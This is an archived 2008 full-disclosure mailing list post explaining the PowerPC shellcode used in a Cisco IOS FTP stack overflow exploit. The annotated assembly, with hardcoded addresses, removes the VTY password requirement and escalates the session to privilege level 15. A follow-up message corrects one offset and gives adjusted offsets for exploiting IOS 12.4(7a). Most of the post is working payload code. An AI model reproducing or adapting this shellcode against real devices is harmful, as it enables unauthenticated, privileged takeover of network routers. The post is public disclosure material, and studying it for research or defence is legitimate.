lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 30 Jul 2008 18:51:12 +0100
From: "Andy Davis" <iosftpexploit@...glemail.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Cisco IOS shellcode explanation - additional

Anyone spot the typo? It's also in a comment in the exploit source,
but doesn't affect how the code works:

"addi    7,7,233" should read "addi    7,7,2330"

The first offset (requirement to authenticate) is at 0x174 and the
second (privilege level) is at 0xde4

Its worth noting that at some stage around IOS 12.4 this structure
changed slightly and therfore if you were planning on exploiting
12.4(7a) which is also vulnerable to the FTP stack overflow, the
offsets are 0x17c and 0xdec

Cheers,

Andy


On Wed, Jul 30, 2008 at 10:03 AM, Andy Davis
<iosftpexploit@...glemail.com> wrote:
> Hi,
>
> Lots of people have been asking for details about the slightly
> unorthodox shellcode I used within the IOS FTP exploit, so here goes:
>
> .equ vty_info, 0x8182da60   //contains a pointer to the VTY info structure
> .equ terminate, 0x80e4086c
>
> lis     4,vty_info@ha
> la      4,vty_info@l(4)
> xor     8,8,8            //Clear r8
> lwzx    7,4,8            //Get pointer to VTY info structure
> stw     8,372(7)         //Write zero to first offset to remove
>                         //the requirement to enter a password
> subi    8,8,1            //Set r8 to be 0xffffffff
> addi    7,7,233          //Add second offset in two steps to
>                         //avoid nulls in the shellcode
> stw     8,1226(7)        //Write 0xffffffff to second offset to
>                         //priv escalate to level 15
>                         //(technically this should be 0xff100000
>                         //but 0xffffffff works and is more efficient)
> mr      3,8              //Use 0xffffffff as a parameter
>                         //to pass to terminate()
> lis     4,terminate@ha
> la      4,terminate@l(4)
> mtctr   4
> bctr                     //terminate "this process"
>                         //(current connection to the FTP server)
>
>
> Cheers,
>
> Andy
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ